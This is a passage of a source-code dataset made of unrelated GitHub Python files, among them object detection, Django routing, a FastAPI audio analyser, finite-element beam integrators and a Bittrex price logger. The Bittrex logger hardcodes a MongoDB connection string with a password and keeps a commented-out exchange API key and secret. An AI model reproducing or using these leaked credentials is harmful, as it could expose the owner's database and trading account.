ases_status\n\n\ndef load_ases_stat(timestamp, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n ases_fields = (\"ases.DUMP_TIME\",\n \"ases.ASNV4_PREF\", \"ases.ASNV6_PREF\")\n\n db_query = \"SELECT {:s} FROM ases WHERE ases.DUMP_TIME = {:d} LIMIT 1\".format(\",\".join(ases_fields), timestamp)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n ases_stat = db_cursor.fetchone()\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return timestamp, (ERROR_STATE,)\n\n if ases_stat is None or len(ases_stat) == 0:\n # logging.critical(\"Database BGP statuses returned empty data\")\n return timestamp, (ERROR_STATE,)\n\n bgp_timestamp = ases_stat[0]\n ases4_prefixes = ases_stat[1]\n ases6_prefixes = ases_stat[2]\n\n return bgp_timestamp, ases4_prefixes, ases6_prefixes","repo_name":"Urlandi/FullViewBot","sub_path":"db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":10728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"32654984285","text":"import os\r\nimport time\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef show_image(img):\r\n cv2.imshow('image', img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n\r\nprint('Opencv version: ', cv2.__version__)\r\n\r\nconfig_path = './cfg'\r\ncoco_names = 'coco.names'\r\nlabels_path = os.path.join(config_path, coco_names)\r\n\r\nwith open(labels_path, 'r') as f:\r\n labels = f.read().strip().split('\\n')\r\n\r\nnet = cv2.dnn.readNetFromDarknet(\r\n './cfg/yolov4.cfg', './heights/yolov4.weights')\r\n\r\n# cores do bounding box\r\nCOLORS = np.random.randint(0, 255, (len(labels), 3), 'uint8')\r\n\r\n# camadas\r\nln = net.getLayerNames()\r\n# camadas de saida\r\noutput_layers = np.take(ln, net.getUnconnectedOutLayers() - 1)\r\n\r\n# imagem de entrada\r\nimg = cv2.imread('./data/eagle.jpg', 1)\r\nimg_copy = img.copy()\r\n\r\nH, W = img.shape[:2]\r\nprint(f'Height: {H} - Width {W}')\r\n\r\nstart = time.time()\r\n\r\nblob = cv2.dnn.blobFromImage(\r\n img, 1 / 255.0, (416, 416), swapRB=True, crop=False)\r\n\r\nnet.setInput(blob)\r\noutputs = net.forward(output_layers)\r\n\r\nend = time.time()\r\nprint(f'Elapsed time: {end - start}')\r\n\r\nthreshold = 0.5 # gatilho de confiança\r\nthreshold_NMS = 0.3 # non maximum supression\r\nbounding_box = []\r\nconfidences = []\r\nclasses_id = []\r\n\r\n\r\nfor output in outputs:\r\n for detection in output:\r\n # os valores a partir da posição 5 são as porcentagens do objeto\r\n # detectado\r\n scores = detection[5:]\r\n # pegamos o index da maior porcentagem detectada\r\n class_id = np.argmax(scores)\r\n # pegamos a porgentagem\r\n confidence = scores[class_id]\r\n if confidence >= threshold:\r\n print(f'Class: {labels[class_id]} | '\r\n f'Confidence: {confidence * 100 :.2f}%')\r\n\r\n (centerX, centerY, width,\r\n height) = detection[:4] * np.array([W, H, W, H])\r\n\r\n x = int(centerX - (width / 2))\r\n y = int(centerY - (height / 2))\r\n\r\n bounding_box.append([x, y, int(width), int(height)])\r\n confidences.append(float(confidence))\r\n classes_id.append(class_id)\r\n\r\n# non max supression\r\nobjs = cv2.dnn.NMSBoxes(bounding_box, confidences, threshold, threshold_NMS)\r\n\r\nif len(objs):\r\n for obj in objs:\r\n x, y = bounding_box[obj][0], bounding_box[obj][1]\r\n w, h = bounding_box[obj][2], bounding_box[obj][3]\r\n # img_new = img_copy[y: y+h, x: x+w]\r\n colors = [int(c) for c in COLORS[classes_id[obj]]]\r\n\r\n cv2.rectangle(img, (x, y), (x + w, y + h), colors, 2)\r\n text = f'{labels[classes_id[obj]]} - '\\\r\n f'{confidences[obj] * 100 :.2f}'\r\n cv2.putText(img, text, (x, y - 5),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, colors, 2)\r\n\r\nshow_image(img)\r\n","repo_name":"lmonferrari/obj_detection","sub_path":"v1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18928253230","text":"import sqlite3\n\n\nclass DBManager:\n \"\"\"\n DB connection object to manage date entry and retrieval\n\n Attributes:\n path (str) : path to database\n \"\"\"\n def __init__(self, path):\n self.db = sqlite3.connect(path)\n self.conn = self.db.cursor()\n\n def __del__(self):\n self.db.close()\n\n def insert_book(self, value_tuple):\n '''Insert book into database.'''\n query = '''\n INSERT INTO books (title, isbn_13, publisher, publication_date, \n series, edition_description, pages, sales_rank, \n price, product_width, product_height, product_depth) \n VALUES (?,?,?,?,?,?,?,?,?,?,?,?)\n '''\n\n self.conn.execute(query, value_tuple)\n self.db.commit()","repo_name":"BlindPrimate/tech_test_enterbridge","sub_path":"db/db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25086123217","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.Employees.as_view(), name='employees'),\n url(r'^add-employee/$', views.add_employee, name='add_employee'),\n url(r'^export-employee/$', views.export_members, name=\"export_employee\"),\n url(r'^detail/$', views.EmployeeDetail.as_view(), name='e_details'),\n url(r'^(?P\\d+)/profile/$', views.Profile.as_view(), name='detail'),\n url(r'^update/$', views.EmployeeUpdate.as_view(), name='update'),\n url(r'^(?P\\d+)/make-request', views.make_request, name='request'),\n url(r'^(?P\\d+)/make-complain', views.make_complain, name='complain'),\n url(r'^history/$', views.RequestList.as_view(), name='leave_history'),\n url(r'^chat/$', views.EmployeeList.as_view(), name='employee_list'),\n\n ]","repo_name":"somchi/EnterpriseSystem","sub_path":"Employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73932413866","text":"from tkinter import *\nfrom tkinter.ttk import Notebook\nimport species\nimport enclosures\nimport exhibits\nimport donors\n\ndef backClicked():\n visitorPage.destroy()\n backFrame.place(relwidth=1,relheight=1)\n\ndef handleVisitorPage(window, bFrame):\n global backFrame\n backFrame = bFrame\n\n global visitorPage\n visitorPage = Frame(window)\n visitorPage.place(relwidth=1, relheight = 1)\n\n backButton = Button(visitorPage, text=\"Back\", command=backClicked)\n visitorNotebook = Notebook(visitorPage)\n visitorNotebook.grid(row=1,column=0)\n backButton.grid(row=0,column=0,columnspan=2,sticky=N+W,padx=5)\n visitorNotebook.grid(row=1,column=0)\n\n visitorPage.rowconfigure(0,weight=1)\n visitorPage.rowconfigure(1,weight=1)\n visitorPage.columnconfigure(0,weight=1)\n visitorPage.columnconfigure(1,weight=1)\n\n # create frames\n enclosuresFrame = Frame(visitorNotebook, width=1000, height=700)\n exhibitsFrame = Frame(visitorNotebook, width=1000, height=700)\n speciesFrame = Frame(visitorNotebook, width=1000, height=700)\n donorFrame = Frame(visitorNotebook, width=1000, height=700)\n\n enclosuresFrame.pack(fill='both', expand=True)\n exhibitsFrame.pack(fill='both', expand=True)\n speciesFrame.pack(fill='both', expand=True)\n donorFrame.pack(fill='both', expand=True)\n\n visitorNotebook.add(enclosuresFrame, text='Enclosures')\n visitorNotebook.add(exhibitsFrame, text='Exhibits')\n visitorNotebook.add(speciesFrame, text='Species')\n visitorNotebook.add(donorFrame, text='Donors')\n\n enclosures.set_enclosures_frame(enclosuresFrame, False)\n exhibits.set_exhibits_frame(exhibitsFrame, False)\n species.setSpeciesFrame(speciesFrame, False)\n donors.set_donors_frame(donorFrame, True)\n","repo_name":"MackenzieBowal/ZooDatabase_Project","sub_path":"gui/visitor.py","file_name":"visitor.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42270292353","text":"from rest_framework.routers import DefaultRouter, SimpleRouter\nfrom .views import OrderViewSet\n\n\nclass OptionalSlashRouter(DefaultRouter):\n def __init__(self):\n self.trailing_slash = '/?'\n super(SimpleRouter, self).__init__()\n\n\nrouter = OptionalSlashRouter()\nrouter.register(\"orders\", OrderViewSet, basename='orders')\nurlpatterns = router.urls\n","repo_name":"sfill70/stepik_rest_api_market","sub_path":"order/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36207239418","text":"#!/usr/bin/python \n# -*- coding=utf8 -*-\n# Created by carrot on 2017/8/28.\n\n\"\"\"\n题目:模仿静态变量(static)另一案例。\n\"\"\"\nclass Num:\n nNum = 1\n def inc(self):\n self.nNum += 1\n print('nNum = %d' % self.nNum )\n\ndef main():\n nNum = 2\n inst = Num()\n for i in range(3):\n nNum += 1\n print('The num = %d' % nNum )\n inst.inc()\n\n\nif __name__ == \"__main__\":\n main()\n\n ","repo_name":"116pythonZS/YiBaiExample","sub_path":"043.py","file_name":"043.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8575411536","text":"from __future__ import print_function\n\nimport pymongo\nimport threading\nimport datetime\nfrom ast import literal_eval\nimport redis\n\nfrom lxml import html\nimport os\nimport sys\nimport datetime as dt\nimport json\nimport requests\nfrom time import sleep\nfrom bittrex import Bittrex\n\nimport pymongo\nfrom pymongo import MongoClient\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n# from common import get_arg\n# Update Python Path to be able to load custom modules. Do not change line position.\n\n# number = 0\n\n\nclass Subscriber:\n def __init__(self, name=None):\n if not name:\n self.name = str(self.__class__).split(' ')[1].split(\"'\")[1]\n else:\n self.name = name\n\n def update(self, message):\n # start new Thread in here to handle any task\n print('\\n\\n {} got message \"{}\"'.format(self.name, message))\n\n\nclass MyMongoClient(Subscriber):\n\n def __init__(self, db_name, collection_name, host='localhost', is_exchange_data=False, port=27017, *args, **kwargs):\n self._c = pymongo.MongoClient(host, port)\n self.set_database(db_name)\n self.set_collection(collection_name)\n self.collection_name = collection_name\n self.db_name = db_name\n self.redis = redis.Redis(host='localhost', port=6379, db=0)\n self.is_exchange_data = is_exchange_data\n\n def is_duplicate_data(self, msg):\n return self.collection.find_one(msg)\n\n def insert_one(self, data):\n self.collection.insert_one(data)\n print('------table name-----')\n print(self.collection)\n print('Inserted: \\n{}'.format(data))\n\n def insert_many(self, msg):\n self.collection.insert_many(msg)\n\n def update(self, msg):\n # msg = literal_eval(msg)\n if not self.is_exchange_data:\n t = threading.Thread(target=self.check_duplicity_and_update_record, args=(msg,))\n else:\n t = threading.Thread(target=self.set_in_redis, args=(msg,))\n t.start()\n\n def check_duplicity_and_update_record(self, msg):\n if not self.is_duplicate_data(msg):\n t = threading.Thread(target=self.insert_many, args=(msg,)) if type(msg) == list else threading.Thread(\n target=self.insert_one, args=(msg,))\n t.start()\n\n def set_in_redis(self, msg):\n key = datetime.datetime.now().replace(second=0, microsecond=0)\n data = {self.db_name: {self.collection_name: [msg]}}\n\n if self.redis.exists(key):\n data = literal_eval(self.redis.get(key))\n print(data)\n if data.has_key(self.db_name) and data[self.db_name].has_key(self.collection_name):\n\n if type(msg) == list:\n data[self.db_name][self.collection_name].extend(msg)\n else:\n data[self.db_name][self.collection_name].append(msg)\n elif data.has_key(self.db_name):\n data[self.db_name].update({self.collection_name: [msg]})\n self.redis.set(key, data)\n\n def set_collection(self, collection_name):\n self.collection = self.database[collection_name]\n\n def set_database(self, db_name):\n self.database = self._c[db_name]\n\n\ndef get_arg(index, default=None):\n \"\"\"\n Grabs a value from the command line or returns the default one.\n \"\"\"\n try:\n return sys.argv[index]\n except IndexError:\n return default\n\n\ndef get_data(number):\n\n db_name = 'BB_coins'\n trader = get_arg(1) # 'LANDON', 'CHRISTIAN' OR 'VIVEK.\n\n # with open('accountkey.json') as data_file:\n # data = json.load(data_file)\n # print(data)\n\n collection_name = '{}_bittrex_account'.format(trader)\n try:\n mongoserver_uri = \"mongodb://Writeuser:TYHJ8ttfZ6JPRvSZbqcW@10.8.0.2:27017/admin\"\n # mongoserver_uri = \"mongodb://Readuser:jbh4S3pCpTGCdIGGVOU6@127.0.0:1\"\n connection = MongoClient(host=mongoserver_uri)\n db = connection['BB_coins']\n db_collection = db[collection_name]\n\n except KeyError:\n host = 'localhost'\n db_collection = MyMongoClient(db_name, collection_name=collection_name, host=host)\n\n balance_curr_codes = []\n market_names = []\n\n # key, secret = \"141172172c12458f8d0051d4c2618559\", \"2d944113b64844f2b3ad33030f99101a\"\n key = get_arg(2)\n secret = get_arg(3)\n\n api = Bittrex(api_key=key, api_secret=secret)\n markets_data = api.get_markets()[\"result\"]\n\n for markets_datum in markets_data:\n if markets_datum[\"BaseCurrency\"] == 'BTC':\n balance_curr_codes.append(markets_datum[\"MarketCurrency\"])\n market_names.append(markets_datum[\"MarketName\"])\n\n for market_name in market_names:\n market_history_data = api.get_market_history(market_name, count=1)[\"result\"][0]\n balance_curr_code = market_name.split('-')[1]\n json_data = ({\n 'Number': number,\n 'balance_curr_code': balance_curr_code,\n 'last_price': market_history_data['Price'],\n 'TimeStamp': market_history_data['TimeStamp']})\n\n db_collection.insert_one(json_data)\n print('------table name-----')\n print(collection_name)\n print('Inserted: \\n{}'.format(json_data))\n\nif __name__ == \"__main__\":\n\n # Time setting.\n number = 0\n next_call = dt.datetime.now()\n time_between_calls = dt.timedelta(seconds=300)\n\n # Main loop.\n while True:\n now = dt.datetime.now()\n if now >= next_call:\n try:\n next_call = now + time_between_calls\n number += 1\n get_data(number)\n except:\n continue\n\n","repo_name":"realchief/BittrexAccountMonitor","sub_path":"web_reports_coins/coins_data_retriever.py","file_name":"coins_data_retriever.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36686266546","text":"import math\n# Enumerate all primes between 1 and an integer input argument. \n\nA = 18\ndef primebrute(x):\n primeList = []\n checker = True\n for i in range(2, x):\n for j in range(2,math.floor(math.sqrt(i))+1):\n if i % j !=0:\n checker = True\n elif i % j == 0:\n checker = False\n break\n if checker == True:\n primeList.append(i)\n else:\n checker = True\n return primeList\n \nprint(primebrute(A))\n\n# The above brute force solution is O(n^3/2) time complexity.\n\n# book gives an example of a sieving approach:\n\ndef generate_primes(n):\n primes = []\n isPrime = [False, False] + [True] * (n-1)\n for p in range(2, n+1):\n if isPrime[p]:\n primes.append(p)\n for i in range(p, n+1, p):\n isPrime[i] = False\n return primes\n\nprint(generate_primes(18))\n\n# yields O(n log log n) time because the time it takes to sift is proportional to n/p\n# but the storage is O(n).","repo_name":"linkel/epi-python","sub_path":"Arrays/5.9-enumPrimes.py","file_name":"5.9-enumPrimes.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"37"}
+{"seq_id":"46014360718","text":"# -*- coding: utf-8 -*-\nfrom starlette.middleware.cors import CORSMiddleware\nimport multiprocessing\nimport logging\nimport os\nimport time\nimport wave\nfrom multiprocessing import set_start_method\nfrom detect_noise import noise_detector\nfrom multiprocessing.queues import Queue\nfrom typing import Optional\nfrom scipy.io.wavfile import read, write\nimport numpy as np\nimport math\nimport io\n\nimport uvicorn\nfrom fastapi import Cookie, Depends, FastAPI, Query, WebSocket, status, Request\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\nimport errno \n\n\n\napp = FastAPI()\nlist_tone = []\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n \nroot = os.path.dirname(__file__)\n\napp.mount('/static', StaticFiles(directory=os.path.join(root, 'static')), name='static')\n\ntemplates = Jinja2Templates(directory=os.path.join(root, 'template'))\n \n \ndef change_to_mathfloor(num):\n return math.floor(num*10)/10\n \ndef conv_to_int(num):\n if (num >= 1.0):\n new = 32767\n elif (num <= -1.0):\n new = -32768\n else:\n new = num * 32768.0\n return int(new)\n \ndef monotone():\n global list_tone\n new_list = [change_to_mathfloor(tone) for tone in list_tone]\n small_change = 0\n big_change = 0\n high = 0\n low = 0\n good = 0\n for i in range(2,len(list_tone)-1):\n \n if round(new_list[i+1] - new_list[i],1) in [0.1,-0.1]:\n small_change += 1\n if round(new_list[i+1] - new_list[i],1) <= -0.2 or round(new_list[i+1] - new_list[i],1) >= 0.2:\n big_change += 1\n if new_list[i] >= 0.4:\n high += 1\n elif new_list[i] <= 0.1:\n low += 1\n else:\n good += 1\n \n return small_change, high, low, good,big_change\n \n \ndef result_tone():\n global list_tone\n small_change, high, low, good, big_change = monotone()\n if good < 0.5*(len(list_tone)-3) and small_change <= 0.5*(len(list_tone)-2):\n return \"#\"*80+\"\\n\" +\" \"*40+\"Results:\\n Apathetic Tone\\n\"\n if good >= 0.5*(len(list_tone)-3) and small_change+big_change >= 0.3*(len(list_tone)-2):\n return \"#\"*80+\"\\n\" +\" \"*40+\"Results:\\n That was good\\n\"\n if high >= 0.5*(len(list_tone)-3):\n return \"#\"*80+\"\\n\"+\" \"*40+\"Results:\\n High voice\\n\"\n if low >= 0.5*(len(list_tone)-3):\n return \"#\"*80+\"\\n\"+\" \"*40+\"Results:\\n Low voice\\n\"\n\n@app.get(\"/\")\nasync def get(request: Request):\n return templates.TemplateResponse('index.html', {'request': request})\n \ndef wav_worker(q: Queue, uid: str, ):\n root = os.path.join(os.path.dirname(__file__), 'upload_waves')\n os.makedirs(root, exist_ok=True)\n filename = os.path.join(root, f'{uid}_{time.time()}.wav')\n try:\n wav = wave.open(filename, mode='wb')\n wav.setframerate(16000)\n wav.setnchannels(1)\n wav.setsampwidth(2)\n\n while True:\n data_bytes = q.get()\n wav.writeframes(data_bytes)\n print(f'q.get {len(data_bytes)}')\n\n except Exception as e:\n logging.debug(e)\n finally:\n wav.close()\n\n logging.info('leave wav_worker')\n\n\n@app.websocket(\"/items/{item_id}/ws\")\nasync def websocket_signal_process(websocket: WebSocket, item_id: str, q: Optional[int] = None):\n global list_tone\n await websocket.accept()\n logging.info('websocket.accept')\n #while True:\n # data = await websocket.receive_text()\n # await websocket.send_text(f\"Message text was: {data}\")\n \n #ctx = multiprocessing.get_context()\n #queue = ctx.Queue()\n #process = ctx.Process(target=wav_worker, args=(queue, item_id))\n #process.start()\n counter = 0\n start1 = time.time()\n start2 = time.time()\n arr = []\n #arr_int = []\n message = \"\"\n message2 = \"\"\n try:\n while True:\n \n data = await websocket.receive()\n end1 = time.time()\n end2 = time.time()\n time_spent1 = end1 - start1\n time_spent2 = end2 - start2\n #print(time_spent1)\n # take a string of floats and convert it to list of floats '1.22,1.33' ==> ['1.33','1.233']\n data_array = data['text'].split(',')\n \n # convert the array items from string to floats ['1.33','1.233'] ==> [1.33,1.233]\n data_array = list(map(float, data_array))\n arr.extend(data_array)\n #arr_int.extend([conv_to_int(num) for num in data_array])\n \n if int(time_spent1) == 2:\n print(\"2 seconds passed\")\n start1 = end1\n maxElement = max(arr)\n list_tone.append(maxElement)\n message = noise_detector(arr,16000)\n arr = []\n print(list_tone)\n \n await websocket.send_text(message)\n if int(time_spent2) == 30:\n start2 = end2\n #speech_feature_detector(arr_int)\n #arr_int = []\n message2 = result_tone()\n await websocket.send_text(message2)\n list_tone = []\n if q is not None:\n await websocket.send_text(f\"Query parameter q is: {q}\")\n #await websocket.send_text(f\"Message text was: {data_array}, for item ID: {item_id}\")\n \n #queue.put(data_array)\n counter += 1\n\n except Exception as e:\n logging.debug(e)\n #finally:\n # Wait for the worker to finish\n \n #queue.close()\n #queue.join_thread()\n # use terminate so the while True loop in process will exit\n #process.terminate()\n #process.join()\n logging.info('leave websocket_endpoint')\n \nif __name__ == '__main__':\n # When using spawn you should guard the part that launches the job in if __name__ == '__main__':.\n # `set_start_method` should also go there, and everything will run fine.\n try:\n set_start_method('spawn')\n except RuntimeError as e:\n print(e)\n\n uvicorn.run('main:app', host='localhost', reload=True)\n","repo_name":"yasmine1998/Audio-Analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40710189124","text":"import numpy as np\n\nfrom .truss_structure_integrator import TrussStructureIntegrator\n\n\nclass EulerBernoulliBeamStructureIntegrator:\n def __init__(self, E, I, q = 3):\n \"\"\"\n EulerBermoulliBeamStructureIntegrator 类的初始化\n\n 参数:\n E -- 杨氏模量\n I -- 惯性矩\n q -- 积分公式的等级,默认值为3\n \"\"\"\n self.E = E\n self.I = I\n self.q = q \n\n def assembly_cell_matrix(self, space, index = np.s_[:], \n cellmeasure = None, out = None):\n \"\"\"\n 组装单元刚度矩阵\n\n 参数:\n space -- 空间维度的元组\n index -- 单元网格的索引,默认为全部单元\n cellmeasure -- 单元的度量,默认为 None,表示使用默认度量\n out -- 输出的数组,默认为 None,表示创建新数组\n\n 返回值:\n 组装好的单元网格刚度矩阵\n \"\"\"\n assert isinstance(space, tuple) \n space0 = space[0]\n mesh = space0.mesh\n GD = mesh.geo_dimension()\n\n assert len(space) == GD\n\n if cellmeasure is None:\n cellmeasure = mesh.entity_measure('cell', index=index)\n\n l = cellmeasure\n c = self.E * self.I\n\n NC = len(cellmeasure)\n ldof = 2 # 一个单元两个自由度, @TODO 高次元的情形?本科毕业论文\n if out is None:\n K = np.zeros((NC, GD*ldof, GD*ldof), dtype=np.float64)\n else:\n assert out.shape == (NC, GD*ldof, GD*ldof)\n K = out\n\n K_values = np.array([\n [12, 6, -12, 6],\n [6, 4, -6, 2],\n [-12, -6, 12, -6],\n [6, 2, -6, 4]\n ], dtype=np.float64)\n\n K_values[1, [1, 3]] *= l\n K_values[3, [1, 3]] *= l\n\n K_matrix = K_values[np.newaxis, :, :]\n\n K = (c / l**3)[:, np.newaxis, np.newaxis] * K_matrix\n\n if out is None:\n return K\n\n\nclass TimoshenkoBeamStructureIntegrator:\n def __init__(self, E, I, A, q = 3):\n \"\"\"\n TimoshenkoBeamStructureIntegrator 类的初始化\n\n 参数:\n E -- 杨氏��量\n I -- 惯性矩\n A -- 梁的横截面积\n q -- 积分公式的等级,默认值为3\n \"\"\"\n self.E = E\n self.I = I\n self.A = A\n self.q = q \n\n self.truss_integrator = TrussStructureIntegrator(E, A, q)\n self.euler_bernoulli_integrator = EulerBernoulliBeamStructureIntegrator(E, I, q)\n\n def assembly_cell_matrix(self, space, index = np.s_[:],\n cellmeasure = None, out = None):\n \"\"\"\n 组装单元网格的刚度矩阵\n\n 参数:\n space -- 空间维度的元组\n index -- 单元网格的索引,默认为全部单元\n cellmeasure -- 单元的度量,默认为 None,表示使用默认度量\n out -- 输出的数组,默认为 None,表示创建新数组\n\n 返回值:\n 组装好的单元网格刚度矩阵\n \"\"\"\n assert isinstance(space, tuple) \n space0 = space[0]\n mesh = space0.mesh\n GD = mesh.geo_dimension()\n\n assert len(space) == GD\n\n if cellmeasure is None:\n cellmeasure = mesh.entity_measure('cell', index=index)\n\n NC = len(cellmeasure)\n\n K_truss = self.truss_integrator.assembly_cell_matrix(space, index, cellmeasure, out)\n K_euler_bernoulli = self.euler_bernoulli_integrator.assembly_cell_matrix(space, index, cellmeasure, out)\n print(\"K_truss:\\n\", K_truss)\n print(\"K_euler_bernoulli:\\n\", K_euler_bernoulli)\n\n c1 = self.E*self.A\n c2 = self.E*self.I\n tan = mesh.cell_unit_tangent(index=index) # 计算单元的单位切向矢量(即轴线方向余弦)\n\n","repo_name":"weihuayi/fealpy","sub_path":"fealpy/fem/beam_structure_integrator.py","file_name":"beam_structure_integrator.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"}
+{"seq_id":"69977512107","text":"Import('env prefix')\nlib_name = 'numlib_integration'\n\nsrc = (\n\t'Quadrature.cpp',\n)\n\nheaders = (\n\t'Quadrature.h',\n\t'QuadRule.h',\n)\n\nlib = env.StaticLibrary(lib_name, src)\n\nenv.Install(prefix+'/lib', lib)\nenv.Install(prefix+'/include/numlib/integration', headers)\n","repo_name":"bsilbaugh/NumLib","sub_path":"src/integration/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74812808746","text":"import loguru\nimport requests\nimport time\n\n\ndef req(url):\n response = requests.get(url=url)\n text = response.text\n url = response.url\n \n return text, response, url\n\ndef log(url):\n time1 = time.time()\n\n request = req(url)\n\n time2 = time.time()\n total_time = time2 - time1\n\n loguru.logger.success(f'{request[1]}, url: {request[2]} execution time: {total_time}')\n\nif __name__ == '__main__':\n log(input('Enter url: '))\n","repo_name":"adolff4ik/simple_loguru","sub_path":"loguru_requests.py","file_name":"loguru_requests.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40303991126","text":"\n# 0 : prev[0]=0\n# 1 : 0 pos = 0 start = 0 prev[1]=0 0\n# 2 : 1 4 pos = 0 1 start = 1 prev[2]=1 1 2\n# 3 : 9 0 1 pos = 0 1 2 start = 9 prev[3]=3 3 4 5\n# 4 : 4 9 0 1 pos = 0 1 2 3 start = 4 prev[4]=6 6 7 8 9 = índices\n# 5 : 4 9 0 1 4 pos = 0 1 2 3 4 start = 4 prev[5]=10 ...\n# 6 : 9 0 1 4 9 0 pos = 0 1 2 3 4 5 start = 9 prev[6]=15\n# ...\n\n# 0=0^2\n# 1=1^2\n# 4=2^2\n# 9=3^2\n\n# | 00 | 01 02 | 03 04 05 | 06 07 08 09 | 10 11 12 13 14 | 15 16 17 18 19 20 | = índices\n# | 0 | 1 4 | 9 0 1 | 4 9 0 1 | 4 9 0 1 4 | 9 0 1 4 9 0 | = elemento correspondiente según índice '(elem%4)**2'\n\nprev,num_line=[0],500 # 500 lineas.\n\ndef max_path(num_line):\n prev=[0] # prev[k] cantidad de elementos antes de la linea 'k' que es lo mismo que el índice del primer elemento en la linea 'k'.\n for ind in range(1,num_line+1): prev.append(ind-1+prev[-1])\n line=[(elem%4)**2 for elem in range(prev[num_line],prev[num_line]+num_line)] # última linea en la pirámide\n while num_line>1: # calcula máximos de a pares y se suman al elemento en la linea anterior hasta llegar al inicio.\n line=[max(line[ind],line[ind+1])+((prev[num_line-1]+ind)%4)**2 for ind in range(0,num_line-1)]\n num_line=num_line-1 # siguiente linea hacia arriba.\n return line[0]\n\nprint(max_path(num_line))\n\n# max_path(500)=3491\n","repo_name":"arcisd/TestEL-Definido","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24645259024","text":"from cafe.engine.http.client import AutoMarshallingHTTPClient\nfrom cloudcafe.meniscus.tenant_api.models.tenant import \\\n Tenant, CreateTenant, ResetToken\nfrom cloudcafe.meniscus.tenant_api.models.producer import \\\n CreateProducer, UpdateProducer, AllProducers, Producer\n\n\nclass MeniscusClient(AutoMarshallingHTTPClient):\n\n def __init__(self, url, api_version, use_alternate=False,\n serialize_format=None, deserialize_format=None):\n super(MeniscusClient, self).__init__(serialize_format,\n deserialize_format)\n self.url = url\n self.api_version = api_version\n self.use_alternate = use_alternate\n\n def _get_base_url(self):\n if not self.use_alternate:\n url = '{base}/{version}/tenant'.format(base=self.url,\n version=self.api_version)\n else:\n url = '{base}/{version}'.format(base=self.url,\n version=self.api_version)\n return url\n\n\nclass TenantClient(MeniscusClient):\n\n def create_tenant(self, tenant_id):\n \"\"\"\n @summary: Creates a tenant with the given id\n @param tenant_id:\n \"\"\"\n url = self._get_base_url()\n resp = self.request('POST', url,\n request_entity=CreateTenant(tenant_id))\n return resp\n\n def get_tenant(self, tenant_id):\n \"\"\"\n @summary: Retrieves the version information from the API\n \"\"\"\n url = '{base}/{tenant_id}'.format(base=self._get_base_url(),\n tenant_id=tenant_id)\n resp = self.request('GET', url, response_entity_type=Tenant)\n return resp\n\n def validate_token(self, tenant_id, msg_token, worker_id, worker_token):\n \"\"\"\n HEAD /v1/{tenant_id}/token\n @summary: Checks to see if the token is valid\n \"\"\"\n url = '{base}/{tenant_id}/token'.format(base=self._get_base_url(),\n tenant_id=tenant_id)\n headers = {\n 'MESSAGE-TOKEN': msg_token,\n 'WORKER-ID': worker_id,\n 'WORKER-TOKEN': worker_token\n }\n return self.request('HEAD', url, headers=headers)\n\n def reset_token(self, tenant_id, invalidate_now):\n \"\"\"\n POST /v1/{tenant_id}/token\n @summary: Should activate the reset token functionality.\n \"\"\"\n url = '{base}/{tenant_id}/token'.format(base=self._get_base_url(),\n tenant_id=tenant_id)\n req_obj = ResetToken(invalidate_now)\n return self.request('POST', url, request_entity=req_obj)\n\n\nclass ProducerClient(MeniscusClient):\n def __init__(self, url, api_version, tenant_id, use_alternate=False,\n serialize_format=None, deserialize_format=None):\n super(ProducerClient, self).__init__(url, api_version,\n use_alternate, serialize_format,\n deserialize_format)\n self.tenant_id = tenant_id\n\n def _generate_producer_url(self, producer_id):\n remote_url = '{base}/{tenant_id}/producers/{producer_id}'\\\n .format(base=self._get_base_url(),\n 